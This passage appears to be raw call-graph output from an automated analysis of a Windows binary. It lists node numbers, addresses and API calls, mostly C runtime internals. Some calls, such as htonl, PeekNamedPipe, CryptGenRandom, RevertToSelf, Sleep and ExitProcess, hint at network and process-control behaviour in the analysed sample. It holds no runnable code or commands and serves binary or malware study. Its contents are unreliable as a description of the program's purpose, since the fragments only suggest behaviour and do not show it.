16778->16782 16779 4fe0075 __lock 65 API calls 16779->16782 16780 4fe0887 ___sbh_alloc_block 5 API calls 16780->16782 16782->16776 16782->16777 16782->16778 16782->16779 16782->16780 16783 4feb3d8 16782->16783 16786 4fdff9b RtlLeaveCriticalSection 16783->16786 16785 4feb3df 16785->16782 16786->16785 16787->16754 16806 4fdff9b RtlLeaveCriticalSection 16788->16806 16790 4fdf554 16790->16764 16792 4fe6305 16791->16792 16793 4fe6302 InterlockedIncrement 16791->16793 16794 4fe630f InterlockedIncrement 16792->16794 16795 4fe6312 16792->16795 16793->16792 16794->16795 16796 4fe631f 16795->16796 16797 4fe631c InterlockedIncrement 16795->16797 16798 4fe6329 InterlockedIncrement 16796->16798 16800 4fe632c 16796->16800 16797->16796 16798->16800 16799 4fe6345 InterlockedIncrement 16799->16800 16800->16799 16801 4fe6355 InterlockedIncrement 16800->16801 16802 4fe6360 InterlockedIncrement 16800->16802 16801->16800 16802->16767 16807 4fdff9b RtlLeaveCriticalSection 16803->16807 16805 4fdf5a2 16805->16769 16806->16790 16807->16805 16809 4fe0117 16808->16809 16813 4fe03b9 16808->16813 16810 4fe0303 VirtualFree 16809->16810 16809->16813 16811 4fe0367 16810->16811 16812 4fe0376 VirtualFree HeapFree 16811->16812 16811->16813 16812->16813 16813->16476 16817 4fdff9b RtlLeaveCriticalSection 16814->16817 16816 4fdd99b 16816->16480 16817->16816 16819 4fc8eed 16818->16819 16820 4fc8ee6 16818->16820 16819->16447 16822 4fc8da9 16820->16822 16823 4fc8db9 16822->16823 16824 4fc8db5 16822->16824 16825 4fc8e15 16823->16825 16826 4fdda1b _malloc 66 API calls 16823->16826 16824->16819 16836 4fd3d4b 16825->16836 16829 4fc8dcf _memset 16826->16829 16828 4fc8e2b 16828->16819 16829->16828 16831 4fd41db 16829->16831 16842 4fd4173 CryptAcquireContextA 16831->16842 16834 4fd41fa 16834->16825 16837 4fd3d5d 16836->16837 16841 4fd3d59 16836->16841 16838 4fd3d94 16837->16838 16839 4fdd93e ___wtomb_environ 66 API calls 16837->16839 16837->16841 16840 4fdda1b _malloc 66 API calls 16838->16840 16839->16838 16840->16841 16841->16828 16843 4fd419c CryptAcquireContextA 16842->16843 16844 4fd41b3 CryptGenRandom 16842->16844 16843->16844 16845 4fd41af 16843->16845 16846 4fd41c8 CryptReleaseContext 16844->16846 16847 4fd41d7 16844->16847 16845->16834 16848 4fd40fd 16845->16848 16846->16845 16847->16846 16849 4fd4117 16848->16849 16850 4fd416b 16849->16850 16851 4fedf1b GetSystemTimeAsFileTime _clock 16849->16851 16850->16834 16851->16849 16853 4fdda1b _malloc 66 API calls 16852->16853 16854 4fcbf6a 16853->16854 16855 4fdda1b _malloc 66 API calls 16854->16855 16858 4fcbf87 _memset 16854->16858 16856 4fcbf7a 16855->16856 16857 4fdd93e ___wtomb_environ 66 API calls 16856->16857 16856->16858 16857->16858 16858->16324 17138 4fddc25 GetSystemTimeAsFileTime 16859->17138 16861 4fd0bcd 17140 4fddfa9 16861->17140 16864 4fdda1b _malloc 66 API calls 16865 4fd0c14 _memset _memcpy_s 16864->16865 17143 4fdf295 16865->17143 16867 4fd0cad 16868 4fdd93e ___wtomb_environ 66 API calls 16867->16868 16870 4fc35cd 16868->16870 16869 4fdf295 _strtok 66 API calls 16871 4fd0c3b _strncpy 16869->16871 16872 4fc970c 16870->16872 16871->16867 16871->16869 16873 4fddc25 __time64 GetSystemTimeAsFileTime 16872->16873 16874 4fc9722 16873->16874 16875 4fddfa9 66 API calls 16874->16875 16876 4fc9729 16875->16876 17153 4fc979e 16876->17153 16879 4fd3b98 16880 4fd3bb1 16879->16880 16881 4fd3bc4 _memset 16879->16881 16882 4fd3bba 16880->16882 16883 4fd3bc6 16880->16883 16881->16330 16884 4fdda1b _malloc 66 API calls 16882->16884 17165 4fdf961 16883->17165 16884->16881 16887 4fc6ddd 16886->16887 16888 4fc6de1 16887->16888 16889 4fc6de3 GetLocalTime 16887->16889 16888->16334 16890 4fc6df5 16889->16890 16890->16334 16893 4fc6e8a 16891->16893 16892 4fc3629 16892->16343 16892->16344 16893->16892 17205 4fcff6b 16893->17205 16895 4fc6ec5 17209 4fcff96 16895->17209 16899 4fc6f02 16897->16899 16898 4fc3637 16898->16348 16898->16350 16899->16898 16900 4fc6f9d htonl htonl 16899->16900 16900->16898 16901 4fc6fbd 16900->16901 16902 4fdda1b _malloc 66 API calls 16901->16902 16903 4fc6fc6 _memcpy_s 16902->16903 16904 4fc701b _memset 16903->16904 16905 4fcff6b 116 API calls 16903->16905 16907 4fdd93e ___wtomb_environ 66 API calls 16904->16907 16906 4fc6ffb 16905->16906 16908 4fcff96 102 API calls 16906->16908 16907->16898 16908->16904 16910 4fd41db 5 API calls 16909->16910 16911 4fcbe33 16910->16911 17656 4fcfd1f 16911->17656 16914 4fddfa9 66 API calls 16915 4fcbe57 16914->16915 17663 4fc34d6 16915->17663 16917 4fcbe5d 16918 4fcbe76 GetCurrentProcess 16917->16918 16919 4fcbe70 16917->16919 17721 4fc797e GetModuleHandleA GetProcAddress 16918->17721 17666 4fd359b AllocateAndInitializeSid 16919->17666 16925 4fcbea6 17672 4fc5851 16925->17672 16928 4fc5851 htonl 16929 4fcbec2 16928->16929 16930 4fc5851 htonl 16929->16930 16931 4fcbecf 16930->16931 17676 4fc5802 htonl 16931->17676 16934 4fc5802 2 API calls 16935 4fcbee4 16934->16935 17679 4fc581f htons 16935->17679 16943 4fcbf05 _memset _memcpy_s 17714 4fcfdf8 16943->17714 16945 4fcbf4a _memset 16945->16359 16948 4fd3ded 16946->16948 16947 4fc36b4 16947->16362 16947->16364 16948->16947 16949 4fd3e34 htonl htonl 16948->16949 16949->16947 16952 4fc8d61 16950->16952 16951 4fc8d6f 16951->16386 16952->16951 17894 4fc8be2 16952->17894 16955 4fd0fa9 16954->16955 16956 4fd0fa2 16954->16956 16959 4fd0fa7 16955->16959 18242 4fd0e17 16955->18242 18234 4fd0d96 16956->18234 16959->16386 18257 4fd3016 16960->18257 16965 4fc5cbf 16967 4fc5c6a 16967->16965 16972 4fc62ae 16971->16972 16973 4fc62a9 16971->16973 16974 4fd3016 RevertToSelf 16972->16974 16973->16386 16975 4fc62b3 16974->16975 18304 4fc609e 16975->18304 16980 4fd105a 16979->16980 16981 4fd106b 16980->16981 16982 4fd1080 16980->16982 16983 4fd107e 16980->16983 16981->16983 18352 4fd1217 16981->18352 16982->16983 16984 4fd1217 139 API calls 16982->16984 16983->16386 16984->16983 18393 4fcc902 16986->18393 16989 4fccda1 18421 4fccc39 16989->18421 16992 4fccdaa GetTickCount 16992->16989 16993 4fccdb0 16992->16993 18432 4fccb9b 16993->18432 16997 4fd41db 5 API calls 16996->16997 16998 4fc648b 16997->16998 16998->16386 18466 4fc8b21 16999->18466 17002 4fc8da9 71 API calls 17004 4fc8abb 17002->17004 17003 4fc8ace Sleep 17006 4fc8ad5 17003->17006 17004->17003 18472 4fc8e5e 17004->18472 17006->16386 17007 4fc8ac9 17007->17003 17007->17006 17009 4fd2f56 17008->17009 17010 4fd2f8c 17009->17010 17011 4fc8b69 73 API calls 17009->17011 17013 4fc4fb0 155 API calls 17010->17013 17012 4fd2f87 17011->17012 18550 4fc8d7f 17012->18550 17015 4fd2f94 17013->17015 18554 4fcb288 17015->18554 17020 4fd2fe9 17021 4fd300e ExitProcess 17020->17021 17022 4fd2fee 17020->17022 18571 4fd1e65 17022->18571 17023 4fd2fa9 Sleep 17023->17023 17024 4fd2fb6 17025 4fd2fe6 RtlExitUserThread 17024->17025 18567 4fd2f25 17024->18567 17025->17020 17030 4fc9042 66 API calls 17031 4fd2fd4 17030->17031 17032 4fc8f1a 71 API calls 17031->17032 17033 4fd2fe3 17032->17033 17033->17025 17035 4fc9b5e __mbschr_l 17034->17035 17036 4fc9ce6 17035->17036 17037 4fdda1b _malloc 66 API calls 17035->17037 17036->16386 17038 4fc9ba3 17037->17038 17039 4fdda1b _malloc 66 API calls 17038->17039 17040 4fc9bae _memset _memcpy_s 17039->17040 17041 4fddfbb _rand 66 API calls 17040->17041 17042 4fc9c23 _memset _memcpy_s 17040->17042 17041->17042 17043 4fc9b4c 66 API calls 17042->17043 17044 4fc9cc3 17043->17044 17045 4fdd93e ___wtomb_environ 66 API calls 17044->17045 17049 4fcfb31 17048->17049 17065 4fcfb2a 17048->17065 17050 4fdda1b _malloc 66 API calls 17049->17050 17051 4fcfb3a 17050->17051 17055 4fcfb4f 17051->17055 18623 4fd6555 17051->18623 17053 4fdd93e ___wtomb_environ 66 API calls 17053->17065 17054 4fde27d 66 API calls 17062 4fcfb6a _memcpy_s 17054->17062 17055->17053 17056 4fd6204 5 API calls 17056->17062 17057 4fcbff3 htonl 17057->17062 17058 4fcfc1c 17059 4fdd93e ___wtomb_environ 66 API calls 17058->17059 17062->17054 17062->17055 17062->17056 17062->17057 17062->17058 17063 4fcfc63 _memcpy_s 17062->17063 17064 4fdd93e ___wtomb_environ 66 API calls 17063->17064 17064->17065 17065->16386 17067 4fce1aa htonl htonl 17066->17067 17069 4fce1e7 _memset 17066->17069 17068 4fce1ca 17067->17068 17067->17069 17068->17067 17068->17069 17069->16386 17071 4fc858d 17070->17071 17072 4fc85d0 17070->17072 17074 4fc85a4 17071->17074 18665 4fc8496 17071->18665 17072->16397 17074->17072 17075 4fc85d2 17074->17075 17077 4fdd93e ___wtomb_environ 66 API calls 17074->17077 17076 4fdd93e ___wtomb_environ 66 API calls 17075->17076 17076->17072 17077->17074 17083 4fcb60a 17078->17083 17079 4fcb610 GetTickCount 17080 4fcb616 GetTickCount htonl 17079->17080 17079->17083 17082 4fc3495 139 API calls 17080->17082 17081 4fcb645 17081->16397 17082->17083 17083->17079 17083->17081 17085 4fcab4e 17084->17085 17096 4fcac10 17084->17096 17086 4fdda1b _malloc 66 API calls 17085->17086 17093 4fcab58 17086->17093 17087 4fcab5b htonl htonl htonl 17087->17093 17091 4fc3495 139 API calls 17091->17093 17092 4fcabcc WaitForSingleObject 17092->17093 17093->17087 17093->17091 17093->17092 17094 4fcabfb _memset 17093->17094 18951 4fcace9 17093->18951 18960 4fcac1d PeekNamedPipe 17093->18960 18966 4fcac82 17093->18966 17095 4fdd93e ___wtomb_environ 66 API calls 17094->17095 17095->17096 17096->16397 17098 4fc3495 139 API calls 17097->17098 17099 4fc6434 17098->17099 17099->16397 17101 4fc5de9 _memset 17100->17101 17102 4fc6008 17101->17102 17103 4fcda45 66 API calls 17101->17103 17102->16397 17104 4fc5e23 17103->17104 17105 4fc5e7d 17104->17105 17107 4fc5e42 17104->17107 17106 4fddb76 __snprintf 102 API calls 17105->17106 17112 4fc5e6a _memset 17106->17112 17109 4fc9b4c 66 API calls 17107->17109 17108 4fddb76 __snprintf 102 API calls 17113 4fc5eb3 17108->17113 17110 4fc5e4f 17109->17110 17111 4fddb76 __snprintf 102 API calls 17110->17111 17111->17112 17112->17108 17139 4fddc55 __aulldiv 17138->17139 17139->16861 17148 4fdf61d 17140->17148 17144 4fdf61d __getptd 66 API calls 17143->17144 17145 4fdf2b8 17144->17145 17146 4fe555e GetPdbDll 5 API calls 17145->17146 17147 4fdf354 17146->17147 17147->16871 17149 4fdf5a4 __getptd_noexit 66 API calls 17148->17149 17150 4fdf625 17149->17150 17151 4fd0bd3 17150->17151 17152 4fde00d __amsg_exit 66 API calls 17150->17152 17151->16864 17152->17151 17154 4fc97b0 17153->17154 17155 4fc35d5 17153->17155 17162 4fcc036 17154->17162 17155->16879 17157 4fdda1b _malloc 66 API calls 17161 4fc97c8 17157->17161 17158 4fcc271 htons 17158->17161 17159 4fd3b98 71 API calls 17159->17161 17160 4fcc036 htons 17160->17161 17161->17155 17161->17157 17161->17158 17161->17159 17161->17160 17163 4fcc047 htons 17162->17163 17164 4fcc043 17162->17164 17163->17164 17164->17161 17166 4fdf96d __lseeki64 17165->17166 17167 4fdf974 17166->17167 17168 4fdf982 17166->17168 17169 4fdda1b _malloc 66 API calls 17167->17169 17170 4fdf989 17168->17170 17171 4fdf995 17168->17171 17187 4fdf97c __dosmaperr __lseeki64 17169->17187 17172 4fdd93e ___wtomb_environ 66 API calls 17170->17172 17177 4fdfb07 17171->17177 17199 4fdf9a2 _memcpy_s ___sbh_resize_block ___sbh_find_block 17171->17199 17172->17187 17173 4fdfb3a 17175 4fe0f4f __calloc_impl 6 API calls 17173->17175 17174 4fdfb0c RtlReAllocateHeap 17174->17177 17174->17187 17178 4fdfb40 17175->17178 17176 4fe0075 __lock 66 API calls 17176->17199 17177->17173 17177->17174 17179 4fdfb5e 17177->17179 17181 4fe0f4f __calloc_impl 6 API calls 17177->17181 17184 4fdfb54 17177->17184 17180 4fdfe0c __filbuf 66 API calls 17178->17180 17182 4fdfe0c __filbuf 66 API calls 17179->17182 17179->17187 17180->17187 17181->17177 17183 4fdfb67 GetLastError 17182->17183 17183->17187 17186 4fdfe0c __filbuf 66 API calls 17184->17186 17189 4fdfad5 17186->17189 17187->16881 17188 4fdfa2d RtlAllocateHeap 17188->17199 17189->17187 17191 4fdfada GetLastError 17189->17191 17190 4fdfa82 RtlReAllocateHeap 17190->17199 17191->17187 17192 4fe0887 ___sbh_alloc_block 5 API calls 17192->17199 17193 4fdfaed 17193->17187 17195 4fdfe0c __filbuf 66 API calls 17193->17195 17194 4fe0f4f __calloc_impl 6 API calls 17194->17199 17196 4fdfafa 17195->17196 17196->17183 17196->17187 17197 4fdfad0 17198 4fdfe0c __filbuf 66 API calls 17197->17198 17198->17189 17199->17173 17199->17176 17199->17187 17199->17188 17199->17190 17199->17192 17199->17193 17199->17194 17199->17197 17200 4fe00d8 VirtualFree VirtualFree HeapFree ___sbh_free_block 17199->17200 17201 4fdfaa5 17199->17201 17200->17199 17204 4fdff9b RtlLeaveCriticalSection 17201->17204 17203 4fdfaac 17203->17199 17204->17203 17206 4fcff7c 17205->17206 17208 4fcff78 17205->17208 17217 4fcff0a 17206->17217 17208->16895 17210 4fddb76 __snprintf 102 API calls 17209->17210 17211 4fd0019 17210->17211 17212 4fddb76 __snprintf 102 API calls 17211->17212 17213 4fd002b _memcpy_s 17212->17213 17216 4fd00f4 _strncmp 17213->17216 17626 4fde27d 17213->17626 17629 4fd6204 17213->17629 17216->16892 17224 4fddb76 17217->17224 17220 4fddb76 __snprintf 102 API calls 17221 4fcff5d 17220->17221 17239 4fddf9e 17221->17239 17225 4fddb86 17224->17225 17226 4fddba3 17224->17226 17228 4fdfe0c __filbuf 66 API calls 17225->17228 17227 4fddbcf 17226->17227 17229 4fddbb2 17226->17229 17242 4fe1128 17227->17242 17230 4fddb8b 17228->17230 17231 4fdfe0c __filbuf 66 API calls 17229->17231 17233 4fe1df7 __filbuf 6 API calls 17230->17233 17234 4fddbb7 17231->17234 17237 4fcff23 17233->17237 17235 4fe1df7 __filbuf 6 API calls 17234->17235 17235->17237 17237->17220 17240 4fddf88 17239->17240 17574 4fe2ce0 17240->17574 17282 4fdf0cd 17242->17282 17245 4fe1193 17246 4fdfe0c __filbuf 66 API calls 17245->17246 17247 4fe1198 17246->17247 17249 4fe1df7 __filbuf 6 API calls 17247->17249 17250 4fe11aa 17249->17250 17251 4fe555e GetPdbDll 5 API calls 17250->17251 17252 4fddbfd 17251->17252 17252->17237 17261 4fe0f77 17252->17261 17254 4fe1e88 100 API calls _write_string 17259 4fe11d4 __aulldvrm _strlen 17254->17259 17255 4fdd93e ___wtomb_environ 66 API calls 17255->17259 17256 4fdf3d1 6 API calls __decode_pointer 17256->17259 17257 4fe1ebb 100 API calls _write_multi_char 17257->17259 17258 4fe10db 100 API calls _write_string 17258->17259 17259->17245 17259->17250 17259->17254 17259->17255 17259->17256 17259->17257 17259->17258 17260 4fe796d 78 API calls __cftof 17259->17260 17296 4fe68ca 17259->17296 17260->17259 17262 4fe4392 __fileno 66 API calls 17261->17262 17263 4fe0f87 17262->17263 17264 4fe0fa9 17263->17264 17265 4fe0f92 17263->17265 17267 4fe0fad 17264->17267 17276 4fe0fba __flsbuf 17264->17276 17266 4fdfe0c __filbuf 66 API calls 17265->17266 17275 4fe0f97 17266->17275 17268 4fdfe0c __filbuf 66 API calls 17267->17268 17268->17275 17269 4fe101b 17270 4fe10aa 17269->17270 17271 4fe102a 17269->17271 17272 4fe42b6 __locking 100 API calls 17270->17272 17273 4fe1041 17271->17273 17278 4fe105e 17271->17278 17272->17275 17402 4fe42b6 17273->17402 17275->17237 17276->17269 17276->17275 17279 4fe1010 17276->17279 17390 4fe7787 17276->17390 17278->17275 17427 4fe5445 17278->17427 17279->17269 17399 4fe773e 17279->17399 17283 4fdf0e0 17282->17283 17289 4fdf12d 17282->17289 17284 4fdf61d __getptd 66 API calls 17283->17284 17285 4fdf0e5 17284->17285 17286 4fdf10d 17285->17286 17299 4fe644a 17285->17299 17286->17289 17314 4fe5cde 17286->17314 17289->17245 17289->17259 17290 4fe4392 17289->17290 17291 4fe43a1 17290->17291 17295 4fe43b6 17290->17295 17292 4fdfe0c __filbuf 66 API calls 17291->17292 17293 4fe43a6 17292->17293 17294 4fe1df7 __filbuf 6 API calls 17293->17294 17294->17295 17295->17259 17297 4fdf0cd _LocaleUpdate::_LocaleUpdate 76 API calls 17296->17297 17298 4fe68dd 17297->17298 17298->17259 17300 4fe6456 __lseeki64 17299->17300 17301 4fdf61d __getptd 66 API calls 17300->17301 17302 4fe645b 17301->17302 17303 4fe6489 17302->17303 17304 4fe646d 17302->17304 17305 4fe0075 __lock 66 API calls 17303->17305 17306 4fdf61d __getptd 66 API calls 17304->17306 17307 4fe6490 17305->17307 17308 4fe6472 17306->17308 17330 4fe640c 17307->17330 17311 4fe6480 __lseeki64 17308->17311 17313 4fde00d __amsg_exit 66 API calls 17308->17313 17311->17286 17313->17311 17315 4fe5cea __lseeki64 17314->17315 17316 4fdf61d __getptd 66 API calls 17315->17316 17317 4fe5cef 17316->17317 17318 4fe5d01 17317->17318 17319 4fe0075 __lock 66 API calls 17317->17319 17321 4fe5d0f __lseeki64 17318->17321 17323 4fde00d __amsg_exit 66 API calls 17318->17323 17320 4fe5d1f 17319->17320 17322 4fe5d68 17320->17322 17325 4fe5d36 InterlockedDecrement 17320->17325 17326 4fe5d50 InterlockedIncrement 17320->17326 17321->17289 17386 4fe5d79 17322->17386 17323->17321 17325->17326 17327 4fe5d41 17325->17327 17326->17322 17327->17326 17328 4fdd93e ___wtomb_environ 66 API calls 17327->17328 17329 4fe5d4f 17328->17329 17329->17326 17331 4fe6410 17330->17331 17337 4fe6442 17330->17337 17332 4fe62e4 ___addlocaleref 8 API calls 17331->17332 17331->17337 17333 4fe6423 17332->17333 17333->17337 17341 4fe6373 17333->17341 17338 4fe64b4 17337->17338 17385 4fdff9b RtlLeaveCriticalSection 17338->17385 17340 4fe64bb 17340->17308 17342 4fe6407 17341->17342 17343 4fe6384 InterlockedDecrement 17341->17343 17342->17337 17355 4fe619b 17342->17355 17344 4fe639c 17343->17344 17345 4fe6399 InterlockedDecrement 17343->17345 17346 4fe63a9 17344->17346 17347 4fe63a6 InterlockedDecrement 17344->17347 17345->17344 17348 4fe63b6 17346->17348 17349 4fe63b3 InterlockedDecrement 17346->17349 17347->17346 17350 4fe63c0 InterlockedDecrement 17348->17350 17351 4fe63c3 17348->17351 17349->17348 17350->17351 17352 4fe63dc InterlockedDecrement 17351->17352 17353 4fe63ec InterlockedDecrement 17351->17353 17354 4fe63f7 InterlockedDecrement 17351->17354 17352->17351 17353->17351 17354->17342 17356 4fe621f 17355->17356 17359 4fe61b2 17355->17359 17357 4fe626c 17356->17357 17358 4fdd93e ___wtomb_environ 66 API calls 17356->17358 17362 4fe969a ___free_lc_time 66 API calls 17357->17362 17374 4fe6293 17357->17374 17360 4fe6240 17358->17360 17359->17356 17361 4fe61e6 17359->17361 17369 4fdd93e ___wtomb_environ 66 API calls 17359->17369 17363 4fdd93e ___wtomb_environ 66 API calls 17360->17363 17364 4fe6207 17361->17364 17373 4fdd93e ___wtomb_environ 66 API calls 17361->17373 17365 4fe628c 17362->17365 17366 4fe6253 17363->17366 17367 4fdd93e ___wtomb_environ 66 API calls 17364->17367 17370 4fdd93e ___wtomb_environ 66 API calls 17365->17370 17372 4fdd93e ___wtomb_environ 66 API calls 17366->17372 17375 4fe6214 17367->17375 17368 4fe62d8 17376 4fdd93e ___wtomb_environ 66 API calls 17368->17376 17377 4fe61db 17369->17377 17370->17374 17371 4fdd93e 66 API calls ___wtomb_environ 17371->17374 17378 4fe6261 17372->17378 17379 4fe61fc 17373->17379 17374->17368 17374->17371 17380 4fdd93e ___wtomb_environ 66 API calls 17375->17380 17381 4fe62de 17376->17381 17382 4fe9874 ___free_lconv_mon 66 API calls 17377->17382 17383 4fdd93e ___wtomb_environ 66 API calls 17378->17383 17384 4fe982f ___free_lconv_num 66 API calls 17379->17384 17380->17356 17381->17337 17382->17361 17383->17357 17384->17364 17385->17340 17389 4fdff9b RtlLeaveCriticalSection 17386->17389 17388 4fe5d80 17388->17318 17389->17388 17391 4fe7794 17390->17391 17392 4fe77a3 17390->17392 17393 4fdfe0c __filbuf 66 API calls 17391->17393 17395 4fe77c7 17392->17395 17396 4fdfe0c __filbuf 66 API calls 17392->17396 17394 4fe7799 17393->17394 17394->17279 17395->17279 17397 4fe77b7 17396->17397 17398 4fe1df7 __filbuf 6 API calls 17397->17398 17398->17395 17400 4fe69cd __malloc_crt 66 API calls 17399->17400 17401 4fe7753 17400->17401 17401->17269 17403 4fe42c2 __lseeki64 17402->17403 17404 4fe42ca 17403->17404 17405 4fe42e5 17403->17405 17459 4fdfe1f 17404->17459 17407 4fe42f3 17405->17407 17410 4fe4334 17405->17410 17409 4fdfe1f __lseeki64 66 API calls 17407->17409 17412 4fe42f8 17409->17412 17462 4fe8d47 17410->17462 17411 4fdfe0c __filbuf 66 API calls 17422 4fe42d7 __lseeki64 17411->17422 17414 4fdfe0c __filbuf 66 API calls 17412->17414 17416 4fe42ff 17414->17416 17415 4fe433a 17417 4fe435d 17415->17417 17418 4fe4347 17415->17418 17419 4fe1df7 __filbuf 6 API calls 17416->17419 17421 4fdfe0c __filbuf 66 API calls 17417->17421 17472 4fe3b83 17418->17472 17419->17422 17424 4fe4362 17421->17424 17422->17275 17423 4fe4355 17531 4fe4388 17423->17531 17425 4fdfe1f __lseeki64 66 API calls 17424->17425 17425->17423 17428 4fe5451 __lseeki64 17427->17428 17429 4fe547e 17428->17429 17430 4fe5462 17428->17430 17431 4fe548c 17429->17431 17433 4fe54ad 17429->17433 17432 4fdfe1f __lseeki64 66 API calls 17430->17432 17434 4fdfe1f __lseeki64 66 API calls 17431->17434 17435 4fe5467 17432->17435 17437 4fe54cd 17433->17437 17438 4fe54f3 17433->17438 17436 4fe5491 17434->17436 17439 4fdfe0c __filbuf 66 API calls 17435->17439 17441 4fdfe0c __filbuf 66 API calls 17436->17441 17442 4fdfe1f __lseeki64 66 API calls 17437->17442 17440 4fe8d47 ___lock_fhandle 67 API calls 17438->17440 17451 4fe546f __lseeki64 17439->17451 17443 4fe54f9 17440->17443 17444 4fe5498 17441->17444 17445 4fe54d2 17442->17445 17446 4fe5506 17443->17446 17447 4fe5522 17443->17447 17448 4fe1df7 __filbuf 6 API calls 17444->17448 17449 4fdfe0c __filbuf 66 API calls 17445->17449 17452 4fe53c0 __lseeki64_nolock 68 API calls 17446->17452 17453 4fdfe0c __filbuf 66 API calls 17447->17453 17448->17451 17450 4fe54d9 17449->17450 17454 4fe1df7 __filbuf 6 API calls 17450->17454 17451->17275 17455 4fe5517 17452->17455 17456 4fe5527 17453->17456 17454->17451 17570 4fe5554 17455->17570 17457 4fdfe1f __lseeki64 66 API calls 17456->17457 17457->17455 17460 4fdf5a4 __getptd_noexit 66 API calls 17459->17460 17461 4fdfe24 17460->17461 17461->17411 17463 4fe8d53 __lseeki64 17462->17463 17464 4fe8dae 17463->17464 17467 4fe0075 __lock 66 API calls 17463->17467 17465 4fe8db3 RtlEnterCriticalSection 17464->17465 17466 4fe8dd0 __lseeki64 17464->17466 17465->17466 17466->17415 17468 4fe8d7f 17467->17468 17470 4fe3417 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 17468->17470 17471 4fe8d96 17468->17471 17470->17471 17534 4fe8dde 17471->17534 17473 4fe3b92 __ftelli64_nolock 17472->17473 17474 4fe3beb 17473->17474 17475 4fe3bc4 17473->17475 17505 4fe3bb9 17473->17505 17478 4fe3c2d 17474->17478 17479 4fe3c53 17474->17479 17477 4fdfe1f __lseeki64 66 API calls 17475->17477 17476 4fe555e GetPdbDll 5 API calls 17480 4fe42b4 17476->17480 17481 4fe3bc9 17477->17481 17482 4fdfe1f __lseeki64 66 API calls 17478->17482 17483 4fe3c67 17479->17483 17538 4fe53c0 17479->17538 17480->17423 17484 4fdfe0c __filbuf 66 API calls 17481->17484 17485 4fe3c32 17482->17485 17488 4fe7787 __flsbuf 66 API calls 17483->17488 17487 4fe3bd0 17484->17487 17489 4fdfe0c __filbuf 66 API calls 17485->17489 17490 4fe1df7 __filbuf 6 API calls 17487->17490 17491 4fe3c72 17488->17491 17492 4fe3c3b 17489->17492 17490->17505 17493 4fe3f18 17491->17493 17495 4fdf61d __getptd 66 API calls 17491->17495 17494 4fe1df7 __filbuf 6 API calls 17492->17494 17496 4fe3f28 17493->17496 17497 4fe41e7 WriteFile 17493->17497 17494->17505 17498 4fe3c8d GetConsoleMode 17495->17498 17501 4fe4006 17496->17501 17520 4fe3f3c 17496->17520 17499 4fe421a GetLastError 17497->17499 17500 4fe3efa 17497->17500 17498->17493 17503 4fe3cb8 17498->17503 17499->17500 17502 4fe4265 17500->17502 17500->17505 17507 4fe4238 17500->17507 17518 4fe40e6 17501->17518 17523 4fe4015 17501->17523 17502->17505 17506 4fdfe0c __filbuf 66 API calls 17502->17506 17503->17493 17504 4fe3cca GetConsoleCP 17503->17504 17504->17500 17529 4fe3ced 17504->17529 17505->17476 17509 4fe4288 17506->17509 17511 4fe4257 17507->17511 17512 4fe4243 17507->17512 17508 4fe3faa WriteFile 17508->17499 17508->17520 17515 4fdfe1f __lseeki64 66 API calls 17509->17515 17510 4fe414c WideCharToMultiByte 17510->17499 17517 4fe4183 WriteFile 17510->17517 17551 4fdfe32 17511->17551 17516 4fdfe0c __filbuf 66 API calls 17512->17516 17513 4fe408a WriteFile 17513->17499 17513->17523 17515->17505 17521 4fe4248 17516->17521 17517->17518 17519 4fe41ba GetLastError 17517->17519 17518->17500 17518->17502 17518->17510 17518->17517 17519->17518 17520->17500 17520->17502 17520->17508 17522 4fdfe1f __lseeki64 66 API calls 17521->17522 17522->17505 17523->17500 17523->17502 17523->17513 17525 4fe89d3 11 API calls __putwch_nolock 17525->17529 17526 4fe3d99 WideCharToMultiByte 17526->17500 17527 4fe3dca WriteFile 17526->17527 17527->17499 17527->17529 17528 4fe8baf 78 API calls __fassign 17528->17529 17529->17499 17529->17500 17529->17525 17529->17526 17529->17528 17530 4fe3e1e WriteFile 17529->17530 17548 4fe6902 17529->17548 17530->17499 17530->17529 17569 4fe8de7 RtlLeaveCriticalSection 17531->17569 17533 4fe4390 17533->17422 17537 4fdff9b RtlLeaveCriticalSection 17534->17537 17536 4fe8de5 17536->17464 17537->17536 17556 4fe8cd0 17538->17556 17540 4fe53de 17541 4fe53e6 17540->17541 17542 4fe53f7 SetFilePointer 17540->17542 17544 4fdfe0c __filbuf 66 API calls 17541->17544 17543 4fe540f GetLastError 17542->17543 17546 4fe53eb 17542->17546 17545 4fe5419 17543->17545 17543->17546 17544->17546 17547 4fdfe32 __dosmaperr 66 API calls 17545->17547 17546->17483 17547->17546 17549 4fe68ca __isleadbyte_l 76 API calls 17548->17549 17550 4fe6911 17549->17550 17550->17529 17552 4fdfe1f __lseeki64 66 API calls 17551->17552 17553 4fdfe3d __dosmaperr 17552->17553 17554 4fdfe0c __filbuf 66 API calls 17553->17554 17555 4fdfe50 17554->17555 17555->17505 17557 4fe8cdd 17556->17557 17558 4fe8cf5 17556->17558 17559 4fdfe1f __lseeki64 66 API calls 17557->17559 17560 4fdfe1f __lseeki64 66 API calls 17558->17560 17566 4fe8d3a 17558->17566 17561 4fe8ce2 17559->17561 17563 4fe8d23 17560->17563 17562 4fdfe0c __filbuf 66 API calls 17561->17562 17564 4fe8cea 17562->17564 17565 4fdfe0c __filbuf 66 API calls 17563->17565 17564->17540 17567 4fe8d2a 17565->17567 17566->17540 17568 4fe1df7 __filbuf 6 API calls 17567->17568 17568->17566 17569->17533 17573 4fe8de7 RtlLeaveCriticalSection 17570->17573 17572 4fe555c 17572->17451 17573->17572 17575 4fe2cf9 17574->17575 17578 4fe2ab1 17575->17578 17579 4fdf0cd _LocaleUpdate::_LocaleUpdate 76 API calls 17578->17579 17582 4fe2ac6 17579->17582 17580 4fe2ad8 17581 4fdfe0c __filbuf 66 API calls 17580->17581 17583 4fe2add 17581->17583 17582->17580 17586 4fe2b15 17582->17586 17584 4fe1df7 __filbuf 6 API calls 17583->17584 17587 4fe2aed 17584->17587 17589 4fe2b5a 17586->17589 17590 4fe6915 17586->17590 17588 4fdfe0c __filbuf 66 API calls 17588->17587 17589->17587 17589->17588 17591 4fdf0cd _LocaleUpdate::_LocaleUpdate 76 API calls 17590->17591 17592 4fe6929 17591->17592 17593 4fe68ca __isleadbyte_l 76 API calls 17592->17593 17596 4fe6936 17592->17596 17594 4fe695e 17593->17594 17597 4fe9658 17594->17597 17596->17586 17598 4fdf0cd _LocaleUpdate::_LocaleUpdate 76 API calls 17597->17598 17599 4fe966b 17598->17599 17602 4fe949e 17599->17602 17603 4fe94bf GetStringTypeW 17602->17603 17604 4fe94ea 17602->17604 17605 4fe94df GetLastError 17603->17605 17606 4fe94d7 17603->17606 17604->17606 17607 4fe95d1 